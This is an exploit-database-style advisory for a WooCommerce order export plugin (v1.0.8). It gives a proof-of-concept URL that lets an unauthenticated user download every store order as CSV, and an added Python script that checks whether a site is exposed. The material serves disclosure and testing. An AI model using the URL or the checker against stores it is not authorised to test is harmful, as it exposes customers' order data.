
# Exploit Title: WordPress Plugin Order Export Import for WooCommerce - Order Information Disclosure
# Link: https://wordpress.org/plugins/order-import-export-for-woocommerce/
# Version: 1.0.8
# Date: 19th 2016
# Exploit Author: contact ([a]) david-peltier ([d]) fr
# Vendor Homepage: xadapter.com
# Timeline: Vulnerability found: 17-09-2016, reported to vendor: 18-09-2016, fix: 19-09-2016

### SUMMARY
WooCommerce Order Export Import Plugin helps you to easily export and import orders in your store.

This vulnerability allows an unauthenticated attacker to export all orders in the store: the export action is reachable without a logged-in WordPress session.

### POC
http://server/wp-admin/admin.php?page=wf_woocommerce_order_im_ex&action=export

Requesting this URL without any session cookie returns a CSV file containing all orders, the same export an administrator would download.

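The following checker is an added example and is not part of the advisory or of the plugin's own code. It sends the proof-of-concept request above with no cookies, refuses to follow redirects, and classifies the answer: a redirect to wp-login.php (WordPress's normal behaviour for unauthenticated wp-admin requests) means the export is protected, while a 200 response served as a CSV download that parses into a header row plus at least one record means order data leaked. The export path is the one from the POC; the function names, the "looks like a download" heuristic and the sample CSV used for the offline demonstration are this example's own assumptions.

```python
"""Check whether the WooCommerce order export is served to unauthenticated
clients. Added example for this advisory; helper names and thresholds are
assumptions, only the export path comes from the published POC."""
import csv
import io
import sys
import urllib.error
import urllib.request

# Path from the advisory's proof of concept.
EXPORT_PATH = "/wp-admin/admin.php?page=wf_woocommerce_order_im_ex&action=export"


def csv_has_order_rows(body):
    """True when the body parses as CSV with a header row and at least one
    data record (a header-only file proves nothing about order disclosure)."""
    try:
        text = body.decode("utf-8-sig")   # tolerate a UTF-8 BOM
    except UnicodeDecodeError:
        return False
    rows = [r for r in csv.reader(io.StringIO(text)) if any(c.strip() for c in r)]
    return len(rows) >= 2 and len(rows[0]) >= 2


def classify_response(status, headers, body):
    """Classify one unauthenticated response to the export URL.

    headers: dict with lower-case header names; body: bytes.
    Returns 'vulnerable', 'protected' or 'inconclusive'.
    """
    location = headers.get("location", "")
    if status in (301, 302, 303, 307, 308) and "wp-login.php" in location:
        return "protected"           # sent to the login page, as WordPress should
    if status in (401, 403):
        return "protected"
    if status != 200:
        return "inconclusive"
    ctype = headers.get("content-type", "").lower()
    disposition = headers.get("content-disposition", "").lower()
    looks_like_download = "csv" in ctype or "attachment" in disposition
    if not looks_like_download:
        return "inconclusive"        # e.g. an HTML page, not a data dump
    return "vulnerable" if csv_has_order_rows(body) else "inconclusive"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Stop at the first redirect so the Location header itself is visible."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def check_site(base_url, timeout=10):
    """Fetch the export URL with no cookies or credentials and classify it."""
    url = base_url.rstrip("/") + EXPORT_PATH
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, headers={"User-Agent": "order-export-check"})
    try:
        with opener.open(req, timeout=timeout) as resp:
            status, hdrs, body = resp.status, resp.headers, resp.read()
    except urllib.error.HTTPError as err:   # redirects and 4xx land here
        status, hdrs, body = err.code, err.headers, err.read()
    headers = {k.lower(): v for k, v in hdrs.items()}
    return classify_response(status, headers, body)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(check_site(sys.argv[1]))   # e.g. python check.py http://server
    else:
        # Offline demonstration on a constructed response (not real order data).
        sample = b"order_id,status,total\n1001,completed,49.90\n"
        print(classify_response(200, {"content-type": "text/csv"}, sample))
```

Run it against a site you are authorised to test; anything other than "protected" on a version below 1.0.9 is worth a manual look, and "inconclusive" usually means a WAF, a caching layer or a customised admin URL sat in the way rather than a fixed plugin.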
### FIX
The vendor fixed this issue in version 1.0.9.